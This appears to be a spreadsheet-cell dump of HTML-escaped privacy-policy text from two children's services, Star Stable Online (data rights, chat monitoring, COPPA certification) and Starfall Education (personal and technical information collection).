    <t>How long do we keep the data?&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;The data we collect is kept for the time necessary to provide the service requested by the User, or stated by the purposes outlined in this document, and the User can always request that Star Stable suspend or remove the data.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="5-how-do-we-handle-your-data-rights-at-star-stable" class="sc-15d1df69-1 laMDKv"&gt;5. How do we handle your data rights at Star Stable?&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;You have rights over your data and can action them as outlined below&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 color="black" style="scroll-margin:115px" id="51-can-i-correct-the-information-you-have-about-me" class="sc-15d1df69-2 jSdxHY"&gt;5.1 Can I correct the information you have about me?&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>In case you would notice that we have the incorrect information about you, you can update and correct some information under “My Account”. If you find that you do not have the possibility to update the data you want please contact our Customer Support Team at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="97e7e5fee1f6f4eed7e4e3f6e5e4e3f6f5fbf2b9f4f8fab9"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 color="black" style="scroll-margin:115px" id="52-can-i-withdraw-my-consent-and-restrict-data-processing-of-my-personal-data" class="sc-15d1df69-2 jSdxHY"&gt;5.2 Can I withdraw my consent and restrict data processing of my personal data?&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;If you decide that you no longer want to have an account with us you can always send a request to our Customer Support Team at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="89f9fbe0ffe8eaf0c9fafde8fbfafde8ebe5eca7eae6e4a7"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;As a registered player you can at any time withdraw the consent you have given by using “My Account” and you can also request that we restrict the processing of your personal data by sending a request to our Customer Support Team at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="4333312a3522203a0330372231303722212f266d202c2e6d"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;We will handle most requests for consent removal, data update or removal or request for information within 30 days.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 color="black" style="scroll-margin:115px" id="53-can-i-request-information-or-ask-for-my-personal-data-to-be-deleted" class="sc-15d1df69-2 jSdxHY"&gt;5.3 Can I request information or ask for my personal data to be deleted?&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;As a registered player you can request for your data to be deleted.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;As a registered parent or legal guardian, you can request that your or your child’s data is deleted. You can also request that your payment methods are deleted.</t>
  </si>
  <si>
    <t>You can request the deletion of data by sending a request to our Customer Support Team at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="5727253e2136342e1724233625242336353b327934383a79"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;For safety purposes we securely store and archive old data. This is so it can be used to investigate any complaints or violations of our terms and conditions, or on the off-chance that it has been requested by law enforcement agencies or data protection authorities.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Most of the data is fully available for you as a registered player under “My Account” or in the game. Please contact &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="3343415a4552504a7340475241404752515f561d505c5e"&gt;[email&amp;#160;protected]&lt;/a&gt; (see section 9 below for full contact details) if you have any additional requirements on obtaining more information about your personal data.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 color="black" style="scroll-margin:115px" id="54-can-i-move-my-data" class="sc-15d1df69-2 jSdxHY"&gt;5.4 Can I move my data&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Star Stable is considered to be a Data Controller under the GDPR.</t>
  </si>
  <si>
    <t>As part of the law you should be able to move or port out your data to another Data Controller where applicable. For Star Stable this is only applicable to the private persons requesting the data since the products and services cannot be transferred to another Company.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="6-community-or-social-features-we-offer-and-how-we-keep-these-areas-safe" class="sc-15d1df69-1 laMDKv"&gt;6. Community or social features we offer and how we keep these areas safe.&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>Star Stable Online offers in-game chat and mail for our users. It is extremely important for us at Star Stable to ensure a pleasant and safe environment for our players. &lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;To achieve our goal to create a positive environment while safeguarding children&amp;#x27;s personal information, communication between players is monitored by automated tools in order to detect potentially harmful behaviour and to protect our players.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;All in-game communications are filtered and analysed for appropriate behaviour using technology provided by Utopia Analytics. All chat and mails are stored securely for up to twelve months for investigation purposes (such as a complaint, indications for harmful behaviour or a legitimate request for information from a law enforcement agency). &lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p</t>
  </si>
  <si>
    <t>&gt; In case you should observe unwanted behaviour or have any questions, you can contact us using our &lt;a href="https://www.starstable.com/support" class="sc-4cf6d55c-0 iOUcVT"&gt;web-form&lt;/a&gt; at any time. The legal basis for monitoring and storing the chats are our aforementioned legitimate interests (Art. 6 (1) (f) GDPR).&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;You may have a right to object against the monitoring of chats for reasons relating to your particular situation.</t>
  </si>
  <si>
    <t>Please contact us if you think that this is the case.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt; This is currently the only automated decision making at Star Stable.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="7-with-whom-do-we-share-your-information" class="sc-15d1df69-1 laMDKv"&gt;7. With whom do we share your information?&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;We may make personal and anonymous information available to third parties in these limited circumstances: (1) with third party service providers who help us operate our website, online services and mobile apps, such as payment processors, service partners and data processors, for a list of these third party service providers please visit &lt;a href="https://www.starstable.com/service-providers" class="sc-4cf6d55c-0 iOUcVT"&gt;https://www.starstable.com/service-providers&lt;/a&gt;,  (2) with your express consent (or the prior consent of a parent or legal guardian), (3) when we believe it to be required by law or when we co-operate with the police or other authorities, (4) when we believe that it is necessary to protect our rights, users or property, or (5) to any potential successor or purchaser in a merger, change of control,  acquisition, liquidation, reorganization, bankruptcy, receivership, dissolution or sale of assets, or transition of service to a new provider, as permitted by law and/or contract.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="8-how-do-we-keep-your-information-secure" class="sc-15d1df69-1 laMDKv"&gt;8.</t>
  </si>
  <si>
    <t>How do we keep your information secure?&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;At Star Stable we respect the information you entrust to us and take pride in protecting it from unauthorized access or disclosure. Therefore, we have updated both administrative routines, work constantly with training our staff in data privacy protection, and are constantly updating and improving our electronic solutions to keep your data safe. This includes utilizing Secure Sockets Layer (SSL) software, which encrypts all the personal information you give us, and storing your information behind a firewall designed to block access from outside our network.</t>
  </si>
  <si>
    <t>However, although we always do our utmost to protect your data, no security or encryption method can be completely guaranteed to protect information from hackers or human error.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Information we collect may be stored or processed on computers located in any country where we do business.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="9-information-collected-from-children" class="sc-15d1df69-1 laMDKv"&gt;9. Information collected from children &lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Children and their parents in the US have the same rights as our users in the EU which are outlined in this privacy policy.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Parents must provide consent for their child to use Star Stable.&lt;/p&gt;&lt;p&gt;When a child registers for a Star Stable account, we will collect:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt; Date of Birth&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; Email address&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;We also collect a parent’s email address in order to obtain consent. &lt; /p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;When a child plays our game we may also collect:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt; Account data, such as in-game data, game progress, achievements, time spent playing and in-game communications&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; IP address and log in details&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; Technical information about your device, including device identifiers and cookie data&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>The data we collect is kept for the time necessary to provide the service requested by the User, or stated by the purposes outlined in this document, and the User can always request that Star Stable suspend or remove the data.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;As a registered parent or legal guardian, you can request to review or delete your or child’s data by contacting us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="d8a8aab1aeb9bba198abacb9aaabacb9bab4bdf6bbb7b5f6"&gt;[email&amp;#160;protected]&lt;/a&gt; &lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;We use third party service providers to help better understand and improve your use of the site. For a list of third party service providers used in relation to children, please visit &lt;a href="https://www.starstable.com/service-providers" class="sc-4cf6d55c-0 iOUcVT"&gt;https://www.starstable.com/service-providers&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;If you or your parent have any questions about the use of these third parties, or if you would like more information, please contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b1c1c3d8c7d0d2c8f1c2c5d0c3c2c5d0d3ddd49fd2dedc9f"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt; Kids Privacy Assured by PRIVO:</t>
  </si>
  <si>
    <t>COPPA Safe Harbor Certification &amp;amp; GDPRkids™&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Star Stable (owned and operated by Star Stable Entertainment AB) is a member of the PRIVO Kids Privacy Assured Program (“the Program”) for COPPA Safe Harbor Certification and GDPRkids™. PRIVO is an independent, third-party organization committed to safeguarding children’s personal information collected online.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;COPPA Safe Harbor Certification&lt;/strong&gt;&lt;/p&gt;&lt;a href="https://cert.privo.com/#/companies/star_stable"&gt;&lt;div style="overflow:hidden;position:relative;width:100%;max-width:140px"&gt;&lt;img style="display:block;width:100%" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxNDAiIGhlaWdodD0iNzEiPjwvc3ZnPg==" aria-hidden="true" alt="" /&gt;&lt;img role="presentation" aria-hidden="true" alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAANCAIAAAA8DjmHAAABm0lEQVR42l2SDXIDIQiFEU2yu0nO07v0Lj14Vn76AHc6U0McRfl8wI6v759xG9u2Hftx7Pvj8ei9k7vOOc/P/JwqJ7a3zvv9/jq29+v5fh5YxNX7GL1zw6DRGL9WmzAKi9HyH85ctbzEnFNbq4orEIAco46XtxhYwOfp6cxhHVajNlyxiBjlrXvJSoB7LVq9Tw3Hve6ueVy8VBUg/uOuBIEJTR6WOCaqK0vNKEVXWBZkpNrar+L4v7EqlNp6Gi9D5l4vUxR75eOxd8tIN1UzmKUD5wZnXIhImMGI1COkxVM+8JxnhxCg5s1wgcARkakxCDTigVMnJcxp5oInmnKrSvjAVGycMWJEAdICiagECJTeFVxRm+pT7TRrqt2zHFCN1ICn6wXA2FOa4HtMkkzszVFIvSM+QHoCIULRgdTjhmkEDRrdIAdKWvi95IAVqWXFefRTtChYsCAHyg8oyghRAIUG5ITS4nMBEUMitQiDtOwJlGMZnhmirGcFuGqLYIBSELBhLXudVUfLEhm1d7</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="UTF-8"/&gt;
    &lt;title&gt;Starfall Education Privacy Policy&lt;/title&gt;
    &lt;meta name="description" content="The complete privacy policy for Starfall Education, which emphasizes the company’s dedication to safety and security" /&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"/&gt;
    &lt;link rel="icon" type="image/x-icon" href="/favicon.ico"&gt;
    &lt;link href="/css/bootstrap.min.css" rel="stylesheet"&gt;
    &lt;link href="/css/styles.css" rel="stylesheet"&gt;
       &lt;style&gt;
       /*----------------------------- Privacy Page --------------------------*/
       .privacy-header{
           text-align: center;
       }
       .privacy-updated{
           padding-left: 0.75rem;
       }
       .highlight {
           background: #FFF286;
           padding: 15px 20px;
           border-radius: 5px;
           border: 1px solid cadetblue;
       }
       .main-container.privacy h2 {
           font-family: 'starfall_blockbold',sans-serif;
           font-size: 22px;
           line-height: 32px;
           font-weight: normal;
           margin-bottom: -5px;
           margin-top: 28px;
           width: 100%;
           color: #004a93;
       }
       .main-container.privacy a{
           color:#3174AF;
       }
       .main-container.privacy li {
           list-style-type: disc;
           margin: 0 0 20px 20px;
       }
       .main-container.privacy ol li {
           list-style-type: decimal;
           margin: 0;
       }
       .main-container.privacy</t>
  </si>
  <si>
    <t>li:last-child {
           margin-bottom: 0
       }
       .kidsafe-info {
           background: #42739e;
           padding: 19px 15px 18px;
           margin: 0 15px;
           border-radius: 3px;
           color: #fff;
           box-shadow: inset 2px 2px 8px #28547b;
       }
       .kidsafe-info img {
           width: 100%;
           margin-bottom: 3px;
           max-width: 220px;
       }
       .kidsafe-info .kidsafe-container img {
           width: 160px !important;
       }
       .ptc-back-btn img {
           width:60px;
           height:60px;
       }
       img.starfall-logo-privacy {
           height: 42px;
           width: auto;
           margin-top: -12px;
       }
       @media only screen and (max-width: 991px) {
           .kidsafe-container{
               padding-left: 1.5rem;
               padding-right: 1.5rem;
           }
       }
       @media print {
           .main-container.privacy{
               display: block;
           }
       }
   &lt;/style&gt;
    &lt;script src="/js/matomo.js"&gt;&lt;/script&gt;
            &lt;/head&gt;
&lt;body&gt;
&lt;nav class="navbar fixed-top navbar-expand-lg" role="navigation" aria-label="navigation-container"&gt;
    &lt;div class="container-fluid pl-2 g-0"&gt;
        &lt;a class="navbar-brand " href="https://teach.starfall.com/"&gt;&lt;img class="logo no-print" src="/img/templates/ptclogo.png" alt="home"/&gt;&lt;/a&gt;
        &lt;button style="margin-right: 7px" class="btn btn-orange no-print navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent"
                aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"&gt;
            Menu &lt;span class="navbar-toggler-icon"&gt;&lt;/span&gt;
        &lt;/button&gt;
        &lt;div class="collapse navbar-collapse" id="navbarSupportedContent"&gt;
            &lt;ul class="navbar-nav me-auto mb-2 mb-lg-0"&gt;
                &lt;li class="nav-item dropdown"&gt;
                    &lt;a class="nav-link dropdown-toggle p-0" href="#" id="navbarDropdown2" role="button"
                       data-bs-toggle="dropdown"
                       aria-expanded="false"&gt;
                        Using Starfall
                    &lt;/a&gt;
                    &lt;ul class="dropdown-menu" aria-labelledby="navbarDropdown"&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="https://teach.starfall.com/where-do-i-start"&gt;Where</t>
  </si>
  <si>
    <t>Do I Start?&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="https://teach.starfall.com/activities"&gt;Search Starfall Activities&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="https://teach.starfall.com/guides-by-grade"&gt;Starfall Guides by Grade&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="https://teach.starfall.com/research"&gt;Starfall Research&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="/materials/documents/starfall-for-your-school-or-district.pdf" target="_blank"&gt;Starfall for Your School or District&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/li&gt;
                &lt;li class="nav-item dropdown"&gt;
                    &lt;a class="nav-link dropdown-toggle p-0" href="#" id="navbarDropdown" role="button"
                       data-bs-toggle="dropdown"
                       aria-expanded="false"&gt;
                        Worksheets
                    &lt;/a&gt;
                     &lt;ul class="dropdown-menu" aria-labelledby="navbarDropdown"&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="https://teach.starfall.com/worksheets?worksheetType=customizable"&gt;Customizable Worksheets&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="https://teach.starfall.com/worksheets?worksheetType=readymade"&gt;Ready-Made Worksheets&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="https://teach.starfall.com/worksheets"&gt;All Worksheets&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/li&gt;
                &lt;li&gt;&lt;a class="nav-item" href="https://teach.starfall.com/books"&gt;Books&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a class="nav-item" href="https://teach.starfall.com/music"&gt;Music&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a class="nav-item" href="https://teach.starfall.com/projectables"&gt;Projectables&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a class="nav-item" href="https://teach.starfall.com/curriculum"&gt;Curriculum&lt;/a&gt;&lt;/li&gt;
                &lt;li class="nav-item dropdown"&gt;
                    &lt;a class="nav-link dropdown-toggle p-0" href="#" id="navbarDropdown3" role="button"
                       data-bs-toggle="dropdown"
                       aria-expanded="false"&gt;
                        Follow
                    &lt;/a&gt;
                    &lt;ul class="dropdown-menu" aria-labelledby="navbarDropdown"&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" target="_blank" href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Ftwitter.com%2FStarfalledu&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Twitter"&gt;Twitter&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" target="_blank" href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fwww.facebook.com%2Fstarfall.education&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Facebook"&gt;Facebook&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" target="_blank" href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fwww.pinterest.com%2Fstarfallfun&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Pinterest"&gt;Pinterest&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" target="_blank" href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fwww.youtube.com%2Fchannel%2FUCIXeBGVev0u4p5_BXxTxSKg&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Youtube"&gt;Youtube&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class="dropdown-item" href="https://teach.starfall.com/newsletter"&gt;Newsletter&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                 &lt;/li&gt;
            &lt;/ul&gt;
            &lt;button class="d-block no-print btn btn-orange search-icon search-icon-large" data-bs-toggle="modal"
                 data-bs-target="#search-modal" tabindex="0"&gt;Search
                &lt;img src="/img/bootstrap_icons/search.svg"  style="margin-top: -3px;" class="ml-2" alt=""/&gt;
            &lt;/button&gt;
            &lt;button class="d-block no-print btn btn-orange search-icon search-icon-small" data-bs-toggle="modal"
                    data-bs-target="#search-modal" tabindex="0"&gt;
                &lt;img src="/img/bootstrap_icons/search.svg"  style="margin-top: -3px;" class="ml-2" alt="search"/&gt;
            &lt;/button&gt;
            &lt;div class="no-print other-starfall"&gt;
                &lt;a href="https://starfall.com"&gt;Starfall &lt;span&gt;Home&lt;/span&gt;&lt;/a&gt;
                &lt;hr /&gt;
                &lt;a href="https://store.starfall.com"&gt;&lt;span&gt;Starfall&lt;/span&gt; Store&lt;/a&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/nav&gt;&lt;span role="navigation" aria-label="share menu" class="no-print"&gt;
    &lt;a href="#" class="btn btn-outline-share share-button share-button-large"&gt;
        &lt;img src="/img/bootstrap_icons/share.svg" alt=""&gt; &lt;span class="share-button-text"&gt;</t>
  </si>
  <si>
    <t>Share this Page&lt;/span&gt;
    &lt;/a&gt;
    &lt;a href="#" class="btn btn-outline-share share-button share-button-small"&gt;
        &lt;img src="/img/bootstrap_icons/share.svg" alt="share this page"&gt;
    &lt;/a&gt;
    &lt;span class="social-links"&gt;
        &lt;ul&gt;
            &lt;li class="social-share facebook d-inline mr-2"&gt;
                &lt;a href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu%3Dhttps%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Share+to+Facebook" target="_blank"&gt;
                    &lt;img src="/img/social-icon-bw-facebook.png"&gt;
                &lt;/a&gt;
            &lt;/li&gt;
            &lt;li class="social-share twitter d-inline mr-2"&gt;
                &lt;a href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Ftwitter.com%2Fintent%2Ftweet%3Furl%3Dhttps%3A%2F%2Fteach.starfall.com%2Fprivacy%26text%3DThe+complete+privacy+policy+for+Starfall+Education%2C+which+emphasizes+the+company%E2%80%99s+dedication+to+safety+and+security&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Share+to+Twitter" target="_blank"&gt;
                    &lt;img src="/img/social-icon-bw-twitter.png"&gt;
                &lt;/a&gt;
            &lt;/li&gt;
            &lt;li class="social-share pinterest d-inline mr-2"&gt;
                &lt;a href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fwww.pinterest.com%2Fpin%2Fcreate%2Fbutton%2F%3Fdescription%3DThe+complete+privacy+policy+for+Starfall+Education%2C+which+emphasizes+the+company%E2%80%99s+dedication+to+safety+and+security%26url%3Dhttps%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Share+to+Pinterest" target="_blank"&gt;
                    &lt;img src="/img/social-icon-bw-pinterest.png"&gt;
                &lt;/a&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
    &lt;/span&gt;
&lt;/span&gt;
&lt;script src="/js/jquery.3.0.js"&gt;&lt;/script&gt;
&lt;script&gt;
    $( document ).ready(function() {
        $('.share-button').on('click', function(){
            $('.social-links').slideToggle(250, function() {
                $('.share-button').toggleClass('active', $(this).is(':visible'));
            })
        }).on('mouseout ', function () {
            $('.share-button').not(".active").css('background', '#FFAB51');
        }).on('mouseenter', function () {
            $('.share-button').not(".active").css('background', '#FFFFFF');
        });
        $('.share-button img, .share-button-text').on('mouseenter', function(){
            $('.share-button').not(".active").css('background', '#FFFFFF');
        }).on('mouseout', function () {
            $('.share-button').not(".active").css('background', '#FFAB51');
        })
    });
    function isMobileWidth() {
        return $('#mobile-indicator').is(':visible');
    }
&lt;/script&gt;    &lt;div class="section p-0" role="main"&gt;
    &lt;div class="container-lg"&gt;
            &lt;h1 class="privacy-header"&gt;&lt;img class="starfall-logo-privacy" src="/img/common/logos/starfall-logo.svg" alt="Starfall Logo"&gt;&lt;br /&gt;Privacy Policy&lt;/h1&gt;
        &lt;hr class="title-hr" /&gt;
    &lt;div class="row justify-content-center"&gt;
        &lt;p class="privacy-updated p2"&gt;&lt;em&gt;Last Updated:  12 December 2022&lt;/em&gt;&lt;/p&gt;
        &lt;div class="col-lg-9 col-md-8 privacy-intro"&gt;
            &lt;p&gt;Starfall Education Foundation (“we”) strives to create a safe and playful environment for all children.</t>
  </si>
  <si>
    <t>We adhere to a strict policy of respecting and protecting the privacy of our users. This privacy policy applies to Starfall branded websites, mobile applications, and software (collectively the “services”) whether accessed via computer, mobile device, or otherwise.
             &lt;/p&gt;
            &lt;p class="highlight"&gt;&lt;strong&gt;Starfall does not ask children for personal information or track children's progress.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>The Starfall websites and apps directed toward children operate in accordance with COPPA and FERPA. Starfall does not display any advertising to children.
             &lt;/p&gt;
        &lt;/div&gt;
        &lt;div class="col-lg-3 col-md-4 no-print" style="padding:0"&gt;
                        &lt;div class="kidsafe-info text-center"&gt;
                &lt;div class="kidsafe-container"&gt;
                    &lt;img src="/img/logos/kidsafe-seal.png" alt="Starfall.com is listed by the kidSAFE Seal Program."</t>
  </si>
  <si>
    <t>&gt;
                    &lt;br&gt;www.kidsafeseal.com
                &lt;/div&gt;
                                &lt;/div&gt;&lt;!--kidsafe-info--&gt;
            &lt;/div&gt;
            &lt;div class="col-xs-12 privacy-body"&gt;
                &lt;h2 style="margin-top:15px"&gt;Personal Information Collection and Use&lt;/h2&gt;
                &lt;p&gt;&lt;strong&gt;GUESTS&lt;/strong&gt;&lt;br /&gt;
                    Guest visitors to Starfall are not asked to provide personal information. Network information is anonymized.&lt;/p&gt;
                &lt;p&gt;&lt;strong&gt;MEMBERS, SUBSCRIBERS, AND OTHER CUSTOMERS&lt;/strong&gt;&lt;br /&gt;
                     We ask adult users (“you”) to provide information about themselves when: signing in to the member or subscriber portion of Starfall; purchasing in our store; or engaging with customer service.</t>
  </si>
  <si>
    <t>We do not ask for personal information from children.&lt;/p&gt;
                &lt;ul&gt;
                    &lt;li&gt;&lt;strong&gt;Basic Account Information&lt;/strong&gt;: When you become a Starfall member or subscriber, you must provide an email address and a password. We may again ask for this information when you sign in or when you make changes to your account. IP addresses and transactional use may be retained to respond to customer service requests.</t>
  </si>
  <si>
    <t>Aggregated usage data associated with membership or GroupIDs may be provided to teacher, class, and school members upon request.
                     &lt;/li&gt;
                    &lt;li&gt;&lt;strong&gt;Payment Information&lt;/strong&gt;: When you make a purchase of a Starfall product or service, whether it is for an online membership or a physical product, we require billing and shipping information. This information is handled with the utmost care.</t>
  </si>
  <si>
    <t>We engage a secure and nationally recognized payment processor using strong industry standard encryption for credit card transactions. Starfall does not store credit card numbers, nor do we have access to credit card numbers through our payment processor. In order to provide customer service, we retain the details of a purchase, such as the payment date, the billing address, and the shipping address.</t>
  </si>
  <si>
    <t xml:space="preserve">Information regarding subscription payments to an app store are between you and the app store. &lt;/li&gt;
                    &lt;li&gt;&lt;strong&gt;Use of Information&lt;/strong&gt;: We use the information we collect to operate, maintain, and enhance the services we provide, as well as to communicate with you about your account or send you emails about services or activities that may be of interest to you.
                    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
                    &lt;li&gt;&lt;strong&gt;Third Parties&lt;/strong&gt;: We do not rent or sell your personal information to third parties. We do share or disclose your personal information with our trusted vendors, but only as needed to provide our services. These vendor services may include hosting, email delivery, and payment services.
                    </t>
  </si>
  <si>
    <t>&lt;/li&gt;
                &lt;/ul&gt;
                &lt;h2&gt; Technical Information Collection and Use&lt;/h2&gt;
                &lt;p&gt;When you use Starfall on a computer or mobile device, we collect some basic technical information in order to customize your experience as well as to improve our services.&lt;/p&gt;
                 &lt;ul&gt;
                    &lt;li&gt;&lt;strong&gt;Cookies&lt;/strong&gt;: Like many websites, we rely on cookies (a small text file sent to your browser).</t>
  </si>
  <si>
    <t xml:space="preserve">Starfall uses only necessary and functional cookies, for example to retain your preferences and remember the state of an activity (such as an online shopping cart) or a service (such as a membership sign in). Statistical cookies are sparingly used for content intended for parents and educators. Starfall does not use marketing (targeting) cookies, including third party cookies.
                    </t>
  </si>
  <si>
    <t>&lt;/li&gt;
                    &lt;li&gt;&lt;strong&gt;Other Non-Personal Information&lt;/strong&gt;: We automatically receive and record non-personal information on our server logs from a user’s browser. We may collect technical information about the browser, operating system, or mobile device being used, as well as information about patterns of usage and technical performance.
                     &lt;/li&gt;
                    &lt;li&gt;&lt;strong&gt;Use of Technical Information&lt;/strong&gt;:</t>
  </si>
  <si>
    <t>We use the technical information collected to deliver content and support a user’s experience of our services. For example, when a user returns to the services after signing in, cookies help us recognize that user.
                     &lt;/li&gt;
                &lt;/ul&gt;
                &lt;h2&gt;Updating Information and Disclosure of Information&lt;/h2&gt;
                &lt;p&gt;Please contact us at &lt;a  href="mailto:helpdesk@starfall.com"&gt;helpdesk@starfall.com&lt;/a&gt; to update or delete your personal information.</t>
  </si>
  <si>
    <t>We may not be able to delete information in all instances, such as information retained in technical support logs and other business records.&lt;/p&gt;
